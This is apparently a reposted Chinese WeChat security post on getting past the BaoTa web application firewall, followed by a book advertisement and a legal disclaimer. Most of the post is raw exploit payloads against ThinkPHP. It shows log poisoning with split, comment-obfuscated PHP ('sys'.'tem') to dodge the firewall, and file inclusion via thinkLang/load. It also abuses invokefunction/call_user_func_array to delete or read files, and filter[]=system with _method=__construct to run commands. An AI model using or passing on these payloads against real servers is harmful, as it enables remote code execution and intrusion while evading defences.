前言
RCE绕宝塔
POC1
/index.php?s=index&content= phpinfo();
/index.php?s=index/thinkLang/load&file=../runtime/log/202201/21.log
需要将日志删除,然后重新构造
/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=unlink&vars[1][]=../runtime/log/202201/21.log
<?php ?>
或其它就给拦截,我们可以通过拆分进行构造语句http://192.168.172.129:8808/index.php?s=index&content=test11
/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../runtime/log/202201/21.log
<?php system(id);?>
为例子/*.......
.....*/$a="sys"."tem";/*......
....*/$b="id";/*.....
....*/$a($b);/*
/index.php?s=index/thinkLang/load&file=../runtime/log/202201/21.log
poc2
get[]=id&_method=__construct&method=get&filter[]=system
get[]=..runtimelog20220114.log&_method=__construct&method=get&filter[]=unlink
get[]=..runtimelog20220114.log&_method=__construct&method=get&filter[]=think__include_file
好书推荐
AST是目前爬虫领域的热点。本书从AST这一个知识点出发,由浅入深,带领读者掌握反爬虫AST的原理,并帮助读者培养解决实际问题的能力。
本书共11章,分为四部分。第一部分(第1~4章)介绍开发环境的搭建方法、Web调试的必备技巧以及爬虫与反爬虫的基本知识;第二部分(第5~6章)讲解混淆JavaScript代码的手工逆向方法与JavaScript代码安全防护的原理;第三部分(第7~8章)讲解AST的原理与API的使用方法;第四部分(第9~11章)以AST为基础,讲解自动化的JavaScript代码防护与还原方案,并带领读者进行实战训练。
本书适合作为计算机培训的教材,也可供安全开发人员、爬虫初学者以及想要在爬虫领域进阶的人员学习。
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
原文始发于微信公众号(web安全工具库):过WAF(宝塔)的小思路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论